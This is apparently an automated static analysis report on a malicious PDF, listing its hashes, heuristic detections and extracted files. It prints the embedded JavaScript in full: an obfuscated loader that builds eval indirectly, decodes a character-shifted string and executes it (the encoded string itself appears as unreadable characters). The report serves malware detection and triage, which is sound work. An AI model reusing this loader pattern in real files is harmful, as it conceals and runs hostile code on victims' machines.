Malicious PDF — malware analysis report

Static analysis result for SHA-256 fa593089b21d2964…

MALICIOUS

PDF

43.4 KB First seen: 2026-05-10
MD5: 4ec51ee5e2cd3f84e4782e41d2e75a55 SHA-1: 652754c843040d09eac7578b9b7f289ed30041f0 SHA-256: fa593089b21d2964692188398d3024b8d39b4f5066ddccabe1b526ef75792963
126 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The embedded JavaScript stream, named 'javascript_obj0012_000.js', is likely responsible for executing malicious code. The presence of XFA forms and String.fromCharCode further suggests obfuscation techniques commonly used in malicious documents. The exact intent of the script could not be fully determined due to potential obfuscation, but it is highly probable that it attempts to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 6

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
        {
        output += String.fromCharCode(input.charCodeAt(i)+n);
       }
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com Referenced by PDF JavaScript
    • http://ns.adobe.com/xdp/In PDF document text
    • http://www.xfa.org/schema/xci/2.6/In PDF document text
    • http://www.xfa.org/schema/xfa-template/2.6/In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0xA0B1 2417 bytes
SHA-256: 529f3b766d74bbdbe7c16dec4095e7f4c5444949e5df774b08ff19c45e4d68e6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s='�����������������亟���ן������������������������ത��෯�������������������෯���帯���෯��������ෳ��ᵸ����෯���������෯����ⷤ��෴����������������������������������������������������������������������������ത��෯���������෯����ᱤ��ෳ����ᰤ��෯���������������൤��෯���帯���෯���������ෳ��ᵸ����෯���������෯��������������������������������������������������������������������������ത��෯���������෯����ᱤ��ෳ����ᰤ��෯���������������൤��෯���帯���෯���������ෳ��ᵸ����෯���������෯��������������������������������������������������������������ത��෯�������������������෯����ത��෯���������෯����ᱤ��ෳ����ᰤ��෯���������������൤��෯���帯���෯�������������㷤��෯����ത��෯���������෯����ᱤ��ෳ����ᰤ��෯���������������൤��෯����ത��෯���������෯��������෯���帯���෯��������������㴷����෯����ത��෯���������෯����ᱤ��ෳ����ᰤ��෯��������������൤��෯���帯���෯���������ෳ��ᵸ����෯������������������������������������������������⸲�����ᰤ��������ᯤ�㸴�����������峤���������������䷤��㯲���ತ��௤������������������Ɽ��������ᯤ��������ᱤ�������帵����ᵤ�䯲�������尸����������൤�������㸴��������������������೤��������������᳤��᯸�������������������������Ⱔ�����������������寤�������㴤��寤�寴���㸷����ᱤ�䷵�������ⴴ����嵤�䰸�����䷤���䷤�ᵸ������������������䳯���䷯����ⵤ������ತ��෶��㳲�����Ფ�������尲���巳���ᶤ�������䰤�������尤�������䶸�������㳱������������������ᰵ����帴���������䰤��Ჸ�������㵲����ᵤ���尤������������䱤����������������������㳲�������屵����������������������䵤�Ⱟ�����嵟���������򟼟������������������������⡟���������⡟����������������⡟���������⡟�������䟧���������矪�����������������������������ğ��������������槯�������⬯�������������ğ���׺�����ğ��������퟼�����ĭ��������槯�������������������������矻�����������ퟪ���������៼������������槯���������������������������������������ٟ�������������������ּ���ֻ���寺�֪�����������ܼ���᪡򡺟';
    function encode(input,n) {
	    var output = "";
		  for (i=0;i<input.length;i++)
		  {
				output += String.fromCharCode(input.charCodeAt(i)+n);			  
			}
			return output;
		}
		eva(encode(s,127));
font_00_sfnt_off0000033c.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x33C 65932 bytes
SHA-256: 92d15f14547c0fdc01961a3e04412ceed27dc523489920d2a410edbbf30d5a9b